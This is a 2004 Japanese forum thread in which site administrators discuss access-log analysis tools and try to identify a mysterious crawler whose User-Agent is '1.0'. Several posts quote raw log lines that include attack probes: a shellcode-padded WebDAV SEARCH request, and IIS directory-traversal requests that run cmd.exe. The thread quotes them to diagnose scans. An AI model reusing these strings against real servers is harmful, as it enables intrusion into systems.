   あなたはそれでもYahoo!BBを利用し続けますか?


 お客様情報の流出に関するお詫びとお知らせ
 →http://www.softbankbb.co.jp/company/topics/t_040227.html

 YahooBBの信じられない個人情報の扱い
 →http://www.ug5150.net/YahooBB.php





153 :DNS未登録さん:04/02/28 14:39 ID:R2/7Gzun
Yahooは正しい。
今回の件は暴力団の脅しに屈してお金を払った方が安上がりに済んだハズ。
それを敢えて警察に届けた。
経営陣も苦悩したろうが良識ある人達だ。

だ が 回 線 は Y a h o o は 嫌 だ


154 :DNS未登録さん:04/02/28 15:00 ID:???
シャインキターーーーー

155 :DNS未登録さん:04/02/28 15:13 ID:???
加害者はほとんど責められず、ずさんなデータ管理を行っていたYBBばかり責められているよね。

156 :DNS未登録さん:04/02/28 15:42 ID:IJhB5qmx
犯人を責めるのは官憲の仕事。
犯人にデータを取られてしまった、コピーが多分永遠にどっかに残りつづけてしまう
自体を招いた企業の責任は犯人以上に重い

157 :DNS未登録さん:04/02/28 15:42 ID:IJhB5qmx
事態

158 :DNS未登録さん:04/02/28 16:41 ID:???
最近、解析のログ見てたら妙に2chからの訪問が多いな…と思ったら

ネトヲチ板でヲチされてた_| ̄|○

159 :DNS未登録さん:04/02/28 18:49 ID:5eFFANO2
このSambar Serverって
ttp://www.sambar.com/

アクセスログ解析が付いているらしいんですけれども、
どんな画面か知っている人いたら教えてください。

例えば、AWstatsは、ttp://www.bflets.dyndns.org/AWStats5.html
この辺で紹介されていますけど、Sambar Serverの
アクセス解析にもこんな画面紹介があったらおしえてください。



160 : :04/02/29 02:47 ID:Rw41s6uc
くそが!なんでそこ読まないんだよ!
http://www.sambar.com/syshelp/statslog.htm


161 :DNS未登録さん:04/02/29 02:59 ID:drN6WIeI
160様
ありがとうございます。m(_ _)m
精進します。

162 :DNS未登録さん:04/03/01 01:47 ID:???
/usr/bin/analog: analog version 5.32/Unix
/usr/bin/analog: Warning R: Turning off empty Search Word Report
(For help on all errors and warnings, see docs/errors.html)
/usr/bin/analog: Warning R: Turning off empty Operating System Report
/usr/bin/analog: Warning R: In Domain Report, turning off pie chart of only
one wedge

このエラーの解決方教えてください。

163 :162:04/03/01 02:16 ID:???
SEARCHWORD OFF
OSREP OFF
DOMAIN OFF

で自己解決しました

164 :DNS未登録さん:04/03/01 10:07 ID:XV5TQF3O
何万人ものデータ抜かれてすぐにアラートがでないシステムなんて、
終わってるよ。


165 :DNS未登録さん:04/03/01 10:43 ID:???
?

166 :DNS未登録さん:04/03/08 21:10 ID:???
>>164
その誤爆レスどっかで見たんだよなぁ、、
昨夜から思い出せなくてモンモンとしている俺はひまじん

167 :DNS未登録さん:04/03/10 19:17 ID:???
ヤフ関係だろ

168 :DNS未登録さん:04/03/13 20:28 ID:aqXOQS1n
2004/03/13,19:53:13,218.15.44.4,"","-",SEARCH,"/\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1・・・
こんなの来たぞ、ボケ
文字化けでアヘアヘアヘアヘアヘアヘアヘアヘアヘアヘうざいんだよ、やめろ

169 :DNS未登録さん:04/03/14 02:29 ID:???
明らかにウィルスなURLは、別ファイルに捨てるが吉。
UNIX系ならperlか何かでフィルタ書いて、cronで起動。
Win*は...知らん。

170 :DNS未登録さん:04/03/14 13:06 ID:???
この頃、メモリ・ディスクキャッシュが無効なブラウザでアクセスしている方が
増えているのですが、これは何のソフトなんでしょう?

通常、ブラウザで一度取得したデータはディスクキャッシュされて、
再読み込み時はapacheのログに304コードが残り、データ本体を再取得しません。
あるいは、メモリキャッシュされていればサーバにリクエストすらしません。
本件は、ブラウザでファイルの更新日時を*一切*チェックしていないようなので、
ログには200コード*しか*残らず、同一データを読み込む度にサーバへ再取得して来ます。

・概ね100IPに1IPの頻度なのでそこそこ有名なブラウザ?
・数バイトの微小ファイルでもキャッシュされず再取得(200コード)されている
・接続元host名はproxyを連想しない
・agentは素のIEと同じで、.NET CLRを付けたりバリエーションが色々ある
・適切なrefererを送っている
・1IPのページ移動間隔は疎ら(非連続)なので巡回ソフトではない
・IEのディスクキャッシュを最低値にしても再現(同一データを毎回取得)しない
・donut系、BugBrowser、Lunascape、Sleipnirでも再現しない
・(Mozilla、Opera ではディスクキャッシュを無効化できるが、
  メモリキャッシュは有効なので再現しない)

例えば、PukiWikiでは1ページ表示する度にアイコン(画像)の取得(200コード)が
毎回15回程度必ず行われています。リロード攻撃に悪用可能な気もするのですが、
キャッシュ無効なブラウザを知っていますか?

171 :DNS未登録さん:04/03/14 13:40 ID:???
>>170
ローカルプロキシ?

Proxomitronとかノートンとかな

172 :170:04/03/14 14:57 ID:???
なるほど、ローカルプロキシですか。
1MBの送出で済むところを1IPで15MBも要求したり迷惑なんですよね。
mod_throttleで制限できないかテストしてます。

173 :DNS未登録さん:04/03/15 03:26 ID:???
>>172
テスト結果を楽しみにしています

174 :DNS未登録さん:04/03/21 18:05 ID:???
IEでCtrlだかAltとリロードボタンを押すと、強制更新されるやつじゃね?
たまにキャッシュ読ませたくないときに使ってるよ。

175 :DNS未登録さん:04/05/03 10:32 ID:???
この頃、海外からのリファーSPAMが目立つ

176 :DNS未登録さん:04/05/03 14:09 ID:???
>>170
Sleipnir

IE拡張ブラウザだが
キャッシュを使用しないで接続する
オプションがある

http://www20.pos.to/~sleipnir/


177 :DNS未登録さん:04/05/03 15:14 ID:???
Ctrl+F5とSleipnirはハズレ。
ローカルプロキシ経由しか再現しない。

178 :DNS未登録さん:04/05/10 11:45 ID:li03Ix4v
AWStats(アクセス解析ツール)でログを解析しているのですが、
「ロボット/スパイダーの訪問者(トップ10)」のところの「件数」に
「289+56」と表示されることがあります。
「289」は分かるのですが、後の「56」は何を意味するのでしょうか。


179 :DNS未登録さん:04/05/10 12:18 ID:???
>>178
AWStats official web site のトップページにある Features でも読んでろ。

180 :DNS未登録さん:04/05/10 12:42 ID:li03Ix4v
>>178
自己解決しました。

Numbers after + are successful hits on "robots.txt" files

ありがとうございました。

181 :DNS未登録さん:04/05/11 14:04 ID:???
agent に ISBN4-7572-0977-0 とするブラウザは何だろうか?
google で検索すると他でも観測されているようだけど、
>>175 のリファーSPAMならぬ、agent spam?
「アスペクトムックMac OS Xビュンビュンテクニック DVDバックアップ編」って本みたいだけど。

182 :DNS未登録さん:04/05/23 23:37 ID:???
httpサーバーのログ解析ツールはいっぱいあるのにどうして
ftpのは無いのよ。どこに聞いても知ってる人いないし。あうあう。

183 :DNS未登録さん:04/05/24 11:00 ID:???
外部公開するftpサーバは普通立てないからな。
内部向けならsnmp+mrtgでトラフィック見るくらいでしょ。

184 :DNS未登録さん:04/05/24 16:18 ID:???
ツールが無ければ作るのが神

185 :DNS未登録さん:04/05/24 23:14 ID:???
anoymousFTPだってあるじゃないですか.....って言っても
市場は小さいからだろうね、webサーバに比べて。
作ってみるから少し待ちなー..............................って言ってみたいものですよ。

186 :DNS未登録さん:04/05/24 23:17 ID:???
ログの形式教えてくれたら作ってもいいよー

187 :DNS未登録さん:04/05/25 23:04 ID:???
ありがと。でも形式すらわからん房だからいいの。
G6なんだけどね。sawmillが言うこと聞いてくれないの。

188 :DNS未登録さん:04/05/26 03:28 ID:???
リアルタイムで追っかけるわけじゃないなら、スクリプトで整形&表計算アプリで集計で十分なんじゃ?
まさかログがバイナリってことはないだろうし、漠然とFTPのログ言われてもアプリによって違うだろうし。

189 :DNS未登録さん:04/06/01 03:40 ID:???
ハァハァするため

190 :DNS未登録さん:04/08/11 20:51 ID:l9rt4uKV
User-Agent が「1.0」でのアクセスが増加傾向にあるんだけど何だろうか?
大部分が「GET / HTTP/1.0」なので更新時刻を取得するツールなのかな。


191 :DNS未登録さん:04/08/12 01:23 ID:???
そいやリアルタイムで誰が何を見ているのか分かる
スクリプトン入れてる自鯖があったな

192 :DNS未登録さん:04/08/12 17:38 ID:???
行動まで監視されるサイト・・・ガクブル

193 :DNS未登録さん:04/08/12 17:54 ID:???
そりゃちゃうやろ。管理人以外も
自由に見れたから>>191はカキコ
したんだろ?ちゃうんか?

194 :DNS未登録さん:04/08/12 18:40 ID:???
スレ違い。

お前らサーバー監視ツール何使ってる?
http://pc5.2ch.net/test/read.cgi/mysv/1074624631/

195 :DNS未登録さん:04/08/13 00:34 ID:???
>>194
アナタ勘違いしてるあるよ

196 :DNS未登録さん:04/08/18 12:52 ID:???
2004-08-17 06:24:27 GET /galaxy_25764.30313 - - 67.15.12.55 - - - 404 0 64
2004-08-17 06:24:34 HEAD /_mem_bin/..タ/..タ/..タ/..タ/winnt/system32/cmd.exe /c+dir - 67.15.12.55 - - - 404 0 64
2004-08-17 06:24:55 HEAD /_mem_bin/check.bat/..タ/..タ/..タ/winnt/system32/cmd.exe /c+dir - 67.15.12.55 - - - 404 0 64
2004-08-17 06:24:56 HEAD /_vti_bin/..タ/..タ/..タ/..タ/winnt/system32/cmd.exe /c+dir - 67.15.12.55 - - - 404 0 64
これってなんですか?

197 :DNS未登録さん:04/08/18 19:57 ID:???
>>196
有名なセキュホ狙いです。

198 :DNS未登録さん:04/09/03 08:23 ID:3qta8OWs
>>196
今頃乗っ取られているかもしれんぞ。調べてみろ。

199 :DNS未登録さん:04/09/03 16:22 ID:???
2004/09/02,20:57:52,221.113.11.213,"p011213.ppp.asahi-net.or.jp","-","-",GET,"/~hoge/","","1.0",200,818,"-","","1.0"
2004/09/03,04:21:05,210.239.249.211,"ZZ249211.ppp.dion.ne.jp","-","-",GET,"/~hoge/","","1.0",200,784,"-","","1.0"
2004/09/03,11:02:00,219.36.16.27,"YahooBB219036016027.bbtec.net","-","-",GET,"/~hoge/","","1.0",200,134411,"-","","1.0"
2004/09/03,12:52:15,222.3.72.227,"ZH072227.ppp.dion.ne.jp","-","-",GET,"/~hoge/","","1.0",200,15592,"-","","1.0"
2004/09/03,13:39:25,219.124.209.217,"kctv61217.ccnw.ne.jp","-","-",GET,"/~hoge/","","1.0",200,826,"-","","1.0"
2004/09/03,14:34:22,222.3.72.227,"ZH072227.ppp.dion.ne.jp","-","-",GET,"/~hoge/","","1.0",200,21733,"-","","1.0"
2004/09/03,15:46:43,218.126.168.129,"YahooBB218126168129.bbtec.net","-","-",GET,"/~hoge/","","1.0",403,223,"-","","1.0"
UAが"1.0"だけで、各ディレクトリにアクセスする香具師が居るんだけど、これはrobot?

200 :DNS未登録さん:04/09/03 21:16 ID:???
暇な馬鹿。

201 :DNS未登録さん:04/09/04 13:16 ID:???
>>190,199
ブックマークのリンク切れをチェックするソフトかも


202 :DNS未登録さん:04/09/08 21:39 ID:???
190と一緒か・・・
9/3以降何回も違うディレクトリに来てる

203 :DNS未登録さん:04/09/08 23:50 ID:???
まともな目的だったら一旦弾いてみれば説明メールが来るかも

204 :DNS未登録さん:04/09/12 19:03:56 ID:???
AWStatsがどのサイトを見てもどうやってもうまく解析表示出来ないので
違うのを探しています。何かLinux用でおすすめはありますか?
(analogとwebalizer以外で)

205 :DNS未登録さん:04/09/12 19:44:17 ID:???
>>204
アクセスログからナニを見たいのだ?

206 :DNS未登録さん:04/09/12 20:27:44 ID:???
>>205
サーバへのアクセスです。

webalizerは試しに入れているのですが、RPMで入れたからか
日本語表示されないし、見づらいんですよね。。

207 :DNS未登録さん:04/09/13 07:39:47 ID:???
>>206
そんなのおまいがわるいだけじゃん。。
自分の技術のなさをツールのせいにするのはよくないと思います。

208 :DNS未登録さん:04/09/15 22:52:53 ID:???
>>206
本家のrpmかい?
君のディストリのサイトでwebalizerのrpm入れればいいじゃん。
これなら日本語表示だぞ。
VineのWebalizerのrpmは日本語だったし。


209 :DNS未登録さん:04/09/17 15:04:27 ID:WVttNarv
>>190
>>199
たしかに増えてるな。
UA ^1.0 で別ログにとってみる。

210 :DNS未登録さん:04/09/18 19:57:49 ID:???
>>207-208
技術が無くてすみません、、レスも遅れてしまって。。

うちのサーバはRedhat9なのですが、webalizerは
apt-getからinstallしたrpmを入れました。
これだと日本語表示されません。。

改めて入れ直しても大丈夫でしょうか?
(上書きされるのでしょうか?)

211 :DNS未登録さん:04/09/23 07:58:52 ID:???
うちにも UA 1.0 っていうのが来ます。
しかも 199 に出てる IP のうち2つはうちにも来てる。
なんだろう。

212 :DNS未登録さん:04/09/23 15:57:09 ID:???
これとか?
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2004/09.html#20040917_RD-XS40
http://nlogn.ath.cx/archives/000288.html

213 :DNS未登録さん:04/09/27 01:12:11 ID:???
WebTrends使ってる人いないですか。。会社とかで。
試供版試してるんですけど。。設定がうまいこといかないのです。


214 :DNS未登録さん:04/09/27 01:34:41 ID:???
うまくいかない、とだけ言われてもね。
回答する側の事も考えてみるといいよ。

215 :DNS未登録さん:04/10/04 19:30:03 ID:???
firefoxの仕様?
favicon何回も取りに来てウザイ。
バグなら早く直せ。

216 :DNS未登録さん:04/10/04 22:52:54 ID:???
IEだってfavicon探しまくりだze!

217 :DNS未登録さん:04/10/06 15:27:14 ID:uGsB16ug
>>182
awstats なら wu-ftpd の xfer-log 形式解析できるよ

218 :DNS未登録さん:04/10/06 22:15:05 ID:???
php-statsはどうよ?
MySQL使うけど。

219 :DNS未登録さん:04/10/10 14:49:03 ID:???
>>218
デザインがダサいから機雷

220 :DNS未登録さん:04/10/26 17:57:31 ID:???
俺の日記帳

ApacheLogViewer
analog
WebAlizer
AWStats
WebLOG
NetIntellect
WebTrend
php-stats

221 :DNS未登録さん:04/10/27 21:20:12 ID:???
UAが"1.0"ってうちにも来るんだけど、もっと情報ないかな。うざいし、正体不明で不安。
.bbtec.net - - [27/Oct/2004:21:10:30 +0900]
.catvy.ne.jp - - [27/Oct/2004:21:09:24 +0900]
.ocn.ne.jp - - [27/Oct/2004:21:09:17 +0900]

222 :DNS未登録さん:04/11/01 12:41:09 ID:???
2004-10-31 23:43:16 GET /cgi-bin/openwebmail/openwebmail.pl - - 217.67.238.248 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) - - 404 0 64
2004-10-31 23:43:16 GET /cgi-bin/openwebmail/openwebmail.pl - - 217.67.238.248 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) - - 404 0 64
これって何ですか?

223 :DNS未登録さん:04/11/01 12:44:41 ID:???
>>222
ttp://iandu.s7.xrea.com/unimama/logwatch.html

224 :222:04/11/01 12:58:24 ID:???
>>223
ありがとうございました。

225 :DNS未登録さん:04/11/02 15:20:11 ID:???
誰かAWstatsの日本語キーワードの文字化け対応プラグインでつくってくんねーかなー。
access_logをutfに書き出すやり方だとCGIからデータ更新できないんだもん。
神降臨、お待ち申し上げます次第です。

226 :DNS未登録さん:04/11/02 17:10:08 ID:???
おまえが神になれ

227 :DNS未登録さん:04/11/03 02:08:17 ID:???
謎の1.0、1月頃から現れているようで、じゃんじゃん来てます。
たぶん、更新チェッカの類だと思うけど、確かに気になるなぁ。


228 :DNS未登録さん:04/11/03 11:49:28 ID:???
ログをざっとみた範囲で、"1.0"の行動パターン
発信元は日本のISP (会社内、大学・政府系、外国からはなさそう)
アクセスは特定のファイルに集中する (人気のあるファイルとは限らない)
ひどいときは全アクセスの10%近くになり、非常にウザイ

229 :DNS未登録さん:04/11/22 22:33:53 ID:eJixSajB
謎の1.0、403出しているのに全然減らない。なんだ、これは。情報ほしい。

230 :「Y」-и£гЯЙ∀:04/11/22 22:55:59 ID:xOQRgza5
>>229
自分で調べろ!

231 :DNS未登録さん:04/11/23 00:00:22 ID:???
8月から何人も謎だといっているんだが、どうやって調べろと?

232 :DNS未登録さん:04/11/23 00:36:05 ID:???
dns hikutoka...

233 :DNS未登録さん:04/11/23 00:50:52 ID:???
>>232
>>199にあるようなIPのDNSを引いて、どうしろと。
ほかにもあるぞ、
yahoobb220023152003.bbtec.net
yahoobb219012180028.bbtec.net
dsl10923.fip.synapse.ne.jp
catv-224-122-186.tees.ne.jp
asf-cable.c-able.ne.jp
p5091-ipad04otsu.shiga.ocn.ne.jp
DNS引くと何がわかるというんだ

234 :DNS未登録さん:04/11/23 02:18:50 ID:???
基本的に日本からばかりか…

>>233
海外からのアクセスを制限とかしてないですよね?

235 :DNS未登録さん:04/11/23 02:32:00 ID:???
日本製の巡回ツールってこと?

236 :233:04/11/23 09:40:42 ID:???
>>234
海外からのアクセス制限はしていない。

日本からばかりという情報は>>228で既出。だから追加情報を求めている。

237 :DNS未登録さん:04/11/23 14:35:26 ID:???
このアク解なんて1.0だらけでかわいそ
http://www18.big.or.jp/~fujiwara/ikki/admin/ashiato/analyze.cgi?Index

238 :DNS未登録さん:04/11/23 18:41:46 ID:???
>>227
有名なのはWindowsだとWWWCかな?

で、本当に更新チェッカだとすると
ページを更新した後なら同じホストから
1.0の後に別のUAでアクセスしてくるんじゃないか?


239 :DNS未登録さん:04/11/24 12:06:17 ID:???
うちにも"1.0"来てます.
"1.0"だとググりようもなく,情報に飢えています.
>>238
別のUAではアクセスしてきてないです.
結構いろんなIPからアクセスがありますが,
どのアクセスもリクエストが同じなんですよね.
共通する複数のディレクトリだけにアクセスがあります.
更新チェックの対象になりそうなページではないです.(扉ページだったり)
どうもディレクトリ自体がターゲットのような気がして気持ち悪いです.

最近,HTTP_HOSTを調べるようにしてるんですが,"1.0"からのアクセスでは
末尾に":80"が付加されていることがわかりました.
これは全信協(スパマー)とかのメールアドレス収集ロボットと共通する特徴です.
WWWCの場合どうだかわかりませんが(最近"WWWC/1.04"からのアクセスがないので)
Hatena AntennaとかGoogle等検索サービスのロボット,通常のアクセスの場合は
HTTP_HOSTの末尾には":80"は付きません.

240 :バッカーです ◆KeuXjwWDdE :04/11/24 12:59:18 ID:???
うちに来るのは偶然なのか、検索エンジンで拾える.htmlファイルばかり。
最近かなり増えてきた。結構ウザいね。

241 :DNS未登録さん:04/11/24 13:23:49 ID:h8QJ+1IB
うちはニダにワームとトロイとスキャン厨しかこないな。
なんでだろ。

242 :DNS未登録さん:04/11/24 13:44:33 ID:???
9/17以降の1.0
14,533hits
全てhost引ける(ランダムIPではない)
一つのhtmlにだけ27hits(他のhtmlには来てない)

正体不明だけど、そんなに頻繁に来るわけでもないので放置の方向

243 :DNS未登録さん:04/11/24 13:48:52 ID:???
目アド収集か。試しに"1.0"にトラップ食わせてみるか。

244 :DNS未登録さん:04/11/24 20:50:19 ID:???
アクセスが特定のファイルに集中していて、洗いざらいもっていくタイプではない。
別々のディレクトリに分散しているファイルを狙っていて、リンクをたどって巡回して
いるようには見えない。
  ⇒メアド収集っぽくない。
403を出すようにして一ヶ月になるのにアクセスが一向に減らない。サイトの注意書き
のような、頻繁に書き換えず、あまり読まれないファイルも標的に含まれている。
  ⇒更新チェッカっぽくない。
>>239の情報にあるように、アクセス元が分散している割には、アクセス先が共通
  ⇒謎

245 :DNS未登録さん:04/11/24 23:40:46 ID:???
つまり、結論は>謎<ということだ。

246 :DNS未登録さん:04/11/25 00:06:56 ID:???
俺がISPに放置してるページのindex.htmlのアクセスログがたまってたんで、
調べてみた。自鯖じゃないんで、細かいところまでは取ってない。
・初回: 2004/04/08
・11/20までの総数: 816
・最多アクセスドメイン: bbtec(349)
・次点アクセスドメイン: ocn(66)
・逆引き不能IPからのアクセス: 46(述べ数)
ほぼ日本からしか来てない、同日・翌日中に同IPで普通のUAからのアクセス
はない、てのは既出の通り。逆引き不能IPからも、10月以降も時々来ている。
でも、数は少ない。bbtecの一人勝ち。

このページ、アクセス数が落ち切ったところで消そうと思ってたんだが、ここ
んとこ件数だけ見てたから…1.0の奴め幻惑しやがって許さん(ry

247 :DNS未登録さん:04/11/25 00:17:44 ID:???
1.0しかアクセスしてなかったら、それはそれで神(藁

248 :DNS未登録さん:04/11/25 00:25:02 ID:???
>1.0の奴め幻惑しやがって許さん(ry
そう、こいつの最大の被害はファイルごとのアクセス数(人気)の見積りが
完全にくるってしまうこと。

>>228の「会社内、大学・政府系からはなさそう」ってのはほかでもそうかな。
Mozilla/3.01を名乗るキャッシュの自動更新は会社や大学からが多いんだが、
それとはパターンが違うよね。

249 :DNS未登録さん:04/11/25 01:00:06 ID:???
>>248
↓うちに来たやつのうち、YahooBB以外(YahooBBは多すぎるので割愛)
pl1100.nas921.kagoshima.nttpc.ne.jp
zn034107.ppp.dion.ne.jp
n043079.ppp.dion.ne.jp
c4s-nat.cty-net.ne.jp
210-194-124-53.rev.home.ne.jp
eatcf-43p18.ppp15.odn.ne.jp
p8035-ipad44hodogaya.kanagawa.ocn.ne.jp
catv120-109.lan-do.ne.jp
p6093-ipad02otsu.shiga.ocn.ne.jp
kvu067.kvision.ne.jp
61-21-182-95.rev.home.ne.jp
p14204-adsau12honb1-acca.tokyo.ocn.ne.jp

250 :DNS未登録さん:04/11/25 09:27:42 ID:???
今朝、"1.0"から妙なアクセスがありました。
うちのサーバのホスト名はwww.zerma.comなんかじゃないのですが
HTTP_HOST が "www.zerma.com:80"
リクエストが "/japanese/03gs/gsover1.htm"
たしかに、http://www.zerma.com/japanese/03gs/gsover1.htm
ていうのは存在してるらしいけど、なぜうちにこんなアクセスが。

これはデータベース(?)の扱いにおけるバグでしょうか。
やはりなんらかのデータベースを元にウェブを巡回して
何かのデータを収集してるような感じでは?

>>243
僕もトラップしかけてみます。何かあったら報告します。


251 :DNS未登録さん:04/11/25 09:28:16 ID:???
うちには plala.or.jp からも来てる。結局、やっぱり、日本のISPか。

OCNなんかは県名がわかるけど、地域分布はどうかな。
いままで出たのが、滋賀、鹿児島、神奈川、東京。
うちのほうで補うと、和歌山、広島、埼玉、大阪、福岡、長崎、静岡、石川
わからん。

252 :バッカーです ◆KeuXjwWDdE :04/11/25 11:20:02 ID:???
昨日は100件弱。
まだまだ余裕だけど、もし1000件超えたら・・・弾くしかないなぁ。

リクエストが、ひとつのファイルだけだったり全部だったりで
傾向がつかめない。
日本国内のISPってのは、間違いないね。
確かにyahooは多い。比率より多いんじゃないかな。

ログを取るスパイウェアがあったと思うけど、マシン起動時や定期的に
ザラっと舐めてるのかな、とふと思った。
あとは各種ツールバーとかメッセンジャー系くらいしか思いつかない。
いずれにせよ目的は不明だけど。

253 :DNS未登録さん:04/11/25 21:29:17 ID:???
いろいろググり方を工夫してみたが、なかなかいい情報には行き当たらないな。
「"User-Agent" "1.0" bbtec ocn」とかでググるとアク解のページがヒットする。

>>237http://www18.big.or.jp/~fujiwara/ikki/admin/ashiato/analyze.cgi?Index
って、直前の1000件のうち764件が"1.0"なんだな。かわいそうに。


254 :DNS未登録さん:04/11/25 22:54:23 ID:???
うちは、だいたい1日平均 8000hot (600PV) のサーバだけど、
今月の "1.0" のアクセスは16件だけだった。IPアドレスのユニーク数は4。
要所を抜き出すとこんな感じ。
1つのホストが短時間に決まったURLへアクセスしてる。謎。

ntfksm012251.fksm.nt.adsl.ppp.infoweb.ne.jp
 02/Nov/2004:16:17:10 /aaa/cgi-bin/ 403
 02/Nov/2004:16:17:10 /aaa/cgi-bin/bbb/ 403
 02/Nov/2004:16:17:10 /aaa/ 200
 02/Nov/2004:16:17:10 / 200
194tt178.ncv.ne.jp
 02/Nov/2004:19:51:35 /aaa/cgi-bin/ 403
 02/Nov/2004:19:51:35 /aaa/cgi-bin/bbb/ 403
 02/Nov/2004:19:51:35 /aaa/ 200
 02/Nov/2004:19:51:36 / 200
yahoobb221091033040.bbtec.net
 03/Nov/2004:12:20:29 /aaa/cgi-bin/bbb/ 403
 03/Nov/2004:12:20:29 /aaa/cgi-bin/ 403
 03/Nov/2004:12:20:30 / 200
 03/Nov/2004:12:20:30 /aaa/ 200
p4139-ipad05wakayama.wakayama.ocn.ne.jp
 03/Nov/2004:16:48:24 /aaa/cgi-bin/bbb/ 403
 03/Nov/2004:16:48:24 /aaa/cgi-bin/ 403
 03/Nov/2004:16:48:24 / 200
 03/Nov/2004:16:48:25 /aaa/ 200

255 :254:04/11/25 23:07:05 ID:???
いろいろ見て回ったら書き込むまでもないガイシュツの現象ようだったい

256 :DNS未登録さん:04/11/26 00:15:30 ID:???
そうか、これはDDoS攻撃に向けた壮大な実験なのでは?

257 :DNS未登録さん:04/11/26 03:40:40 ID:???
>>254
これみて気になったんで自分とこのログをよく見たら
アクセスの仕方にパターンがあるな。

~/aaa/bbb/ccc/ddd.html
~/aaa/bbb/ccc
~/aaa/bbb
~/aaa
~/

リンクを辿るんじゃなくて、最初にアクセスしたディレクトリを基点に
機械的に上のディレクトリを辿っていってトップに行き着くまで
移動していくみたいだな。
アクセス数が見かけ上膨らんだりページの更新頻度と関係なく
アクセスがあるのはこのせいか。

おまいらのところはどうよ?

258 :DNS未登録さん:04/11/26 04:44:40 ID:???
>>257
うちは二種類しかないんだけど
/aaa/
/
ですなあ


259 :DNS未登録さん:04/11/26 06:56:00 ID:???
1.0、うちも少数ながら来ているので情報おば。

・アクセスはふつうのアクセスプロバイダからくる。
・gzipには対応していないらしい。
・リンク元は100%吐いてない。
・技術系サイトなんだが、持ってかれるページは初心者向けの
 ページが多い。
・画像やCSSは読まない模様。

260 :DNS未登録さん:04/11/26 09:26:21 ID:???
うちは複数のファイルが狙われているので気づかなかったが、確かに一回ごとの
パターンとしては
/aaa/bbb.html
/aaa/
/
が多い。ただ、例外もあるし、必ずしもこの順番でなく、
/aaa/
/
/aaa/bbb.html
のような順番でアクセスしてくることもある。

で、何の目的でロボットはこういうたどり方をするんだろう。

261 :DNS未登録さん:04/11/26 10:32:07 ID:???
検索関係のツールバー?

262 :DNS未登録さん:04/11/27 00:33:47 ID:???
>>254にもあったが
>アクセス元が分散している割には、アクセス先が共通
>  ⇒謎

アクセス先を決めているのがそれぞれのアクセス元ではないという可能性はある?



263 :DNS未登録さん:04/11/27 00:55:43 ID:???
http://headlines.yahoo.co.jp/hl?a=20041126-00000003-zdn_ep-sci
これとか? 話がよくわからないけれど

それにしても目的がわからない。こいつらには何の益があるのだろう。
spamgourmet で作った餌には今のところ食いつかず。

264 :バッカーです ◆KeuXjwWDdE :04/11/27 02:22:15 ID:???
新しく作ったファイルなんかには全然リクエスト来ないし
やっぱり検索エンジンから(何かが)探してきてる気がするんだよなぁ・・・
もしかしてみんなに共通する特定のワードとかあったりして?(笑)
それにしても目的は謎だけど。

265 :DNS未登録さん:04/11/27 16:43:03 ID:???
同じアクセス元とは限らないけど、なんかヒントになるかな。

"yahoobb221091033040.bbtec.net" の検索結果 約 153 件
"yahoobb220023152003.bbtec.net" の検索結果 約 207 件
"yahoobb219012180028.bbtec.net" の検索結果 約 10 件
"p5091-ipad04otsu.shiga.ocn.ne.jp" の検索結果 約 4 件
"61-21-182-95.rev.home.ne.jp" の検索結果 約 12 件
"kvu067.kvision.ne.jp" の検索結果 約 11 件
"zn034107.ppp.dion.ne.jp" の検索結果 3 件
"n043079.ppp.dion.ne.jp" の検索結果 約 2 件
"210-194-124-53.rev.home.ne.jp" の検索結果 約 82 件
"eatcf-43p18.ppp15.odn.ne.jp" の検索結果 6 件
"catv120-109.lan-do.ne.jp" の検索結果 約 14 件

266 :DNS未登録さん:04/11/27 16:44:52 ID:???
yahooの利用者って馬鹿ばっか

267 :DNS未登録さん:04/11/27 17:51:12 ID:???
「"yahoobb221091033040.bbtec.net" "yahoobb220023152003.bbtec.net"」の検索結果約68件
はほぼ確実に"1.0"のターゲットと考えていいだろう。
http://www.google.co.jp/search?sourceid=navclient&hl=ja&ie=UTF-8&q=%22yahoobb221091033040%2Ebbtec%2Enet%22+%22yahoobb220023152003%2Ebbtec%2Enet%22&num=100

ターゲットに日本国内のサーバが多いのは予想できるが、外国もあるな。
http://physics.wku.edu/cgi-bin/awstats/awstats.pl?lang=en&output=unknownrefererbrowser
Western Kentcky Universityなんて初耳だが、日本語のコンテンツがあるようには思えない。

268 :バッカーです ◆KeuXjwWDdE :04/11/27 18:41:18 ID:???
関連有りそうな、なさそうな
http://www.itmedia.co.jp/enterprise/articles/0411/27/news003.html

269 :DNS未登録さん:04/11/27 20:52:00 ID:???
http://www.artn.co.jp/support/counter/acs_stat7.html
ここってネットワーク屋さんらしいけど、ほとんどのアクセスが1.0だ。それに
Naverbotやmsnbotやinktomisearchやteomaを引くと、まともなブラウザからの
アクセスがなくなってしまう。

270 :DNS未登録さん:04/11/28 03:31:06 ID:???
ううむ 何の陰謀なんだろう。
ここまでか。ここまでしかわからないのか。

271 :DNS未登録さん:04/11/28 11:59:50 ID:???
"1.0"に気づいた人の日記、発見。
http://www.nminoru.jp/~nminoru/diary/2004/09.html#2004-09-10

272 :DNS未登録さん:04/11/28 12:14:25 ID:???
不審に思って質問した人を発見。
http://www.gac.jp/article/index.php?stats=question&category=2&id=13270&command=msg

273 :DNS未登録さん:04/11/28 13:44:52 ID:???
一番下のとこ
http://www.hyuki.com/yukiwiki/wiki.cgi?UserAgent


274 :DNS未登録さん:04/11/28 14:05:36 ID:???
なんか面白そうだから、俺のUserAgent、1.0にしてみた。

275 :DNS未登録さん:04/11/28 17:30:28 ID:???
Web製作板6hotスレ
http://pc5.2ch.net/test/read.cgi/hp/1098189672/447-453
>447 :Name_Not_Found :04/11/16 15:22:48 ID:???
>最近、user-agentが「1.0 」とだけで、いろんなホストの人が来るんだけど
>どういうブラウザ使っているのだろう

276 :DNS未登録さん:04/11/28 17:30:33 ID:???
うちはsquid通してるから常にHTTP/1.0だわ。


277 :DNS未登録さん:04/11/28 18:08:03 ID:???
ここの日記にも
http://sabimaru.no-ip.com/diary/200411.html#1101

278 :DNS未登録さん:04/11/28 18:20:40 ID:???
これの933-958
http://faq.sakura.ne.jp/2chlog/1098358628.html

http://faq.sakura.ne.jp/wiki/wiki.cgi?.htaccess#i12
>最近流行している「1.0」のみのUser-Agentを規制する場合は "^1\.0$" な。"



279 :DNS未登録さん:04/11/28 18:55:10 ID:???
俺のサイト(ロダ設置)にはあんまり縁がなさそうだね。
Hotzonuが 593 に対して、1.0は 9 ですた(リクエスト数)

